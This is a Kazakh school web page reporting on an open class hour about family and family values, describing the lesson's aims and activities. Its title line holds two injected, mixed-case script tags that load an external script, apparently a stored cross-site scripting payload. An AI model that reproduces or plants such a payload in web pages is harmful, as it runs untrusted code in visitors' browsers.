«Отбасы және отбасылық құндылықтар»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.11.2019

«Отбасы және отбасылық құндылықтар» тақырыбында ашық сынып сағаты өтті»

Сынып сағатының мақсаты: оқушылардың бойында аға буынға деген сүйіспеншілік пен құрмет сезімін, өз отбасы мүшелеріне деген жағымды қарым-қатынасты қалыптастыруға ықпал ету.

Білім алушылардың алдына қойылған мақсаттарға қол жеткізілді.

Біздің сабақ барысында оқушылар «отбасы және отбасылық құндылықтар» туралы шағын ақпаратпен танысты. Балалар «Адамға отбасы не үшін» (ата-аналар, балалар және қарт адамдар) кластерін құрып, топтарда белсенді жұмыс істеді. Әр топ өз жобасын қорғады. «Неге адамға отбасы қажет» атты танымдық бейне көрді, сонымен қатар балалар мақал-мәтелдерді қызығушылықпен шешті. Отбасы, ата-аналар туралы өлеңдер айтты.

Сабақ соңында балалар отбасылық құндылықтар туралы парақшаларда жазып, бірге талқылап, «ағашқа» бекітті. Барлық балалар сабаққа белсене қатысты.

Сынып жетекшісі Кельдиарова М.Б.

Просмотров: 688


Пікір қосу



Деректерді қолтаңбаға қосу